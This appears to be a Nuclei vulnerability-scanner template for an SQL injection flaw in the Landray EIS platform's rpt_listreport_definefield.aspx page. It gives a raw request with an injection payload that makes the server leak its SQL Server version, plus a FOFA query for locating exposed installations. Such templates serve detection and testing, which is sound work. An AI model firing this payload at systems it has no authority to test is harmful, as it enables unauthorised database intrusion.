id: landray-eis-rpt-listreport-definefield-sqli

info:
  name: 蓝凌 EIS 智慧协同平台 rpt_listreport_definefield.aspx - sqli
  author: leadlife
  severity: high
  description: The Landray EIS Smart Collaboration Platform integrates a wealth of modules to meet the organizational and enterprise needs in knowledge, collaboration, and project management system construction. There exists an SQL injection vulnerability in the rpt_listreport_definefield.aspx interface of the Landray EIS Smart Collaboration Platform.
  reference:
    - todo
  metadata:
    verified: true
    fofa-query: app="Landray-EIS智慧协同平台" || icon_hash="953405444"
  tags: landray,sqli,oa

http:
  - raw:
      - |
        GET /SM/rpt_listreport_definefield.aspx?ID=2%20and%201=@@version--+ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "Microsoft SQL Server"
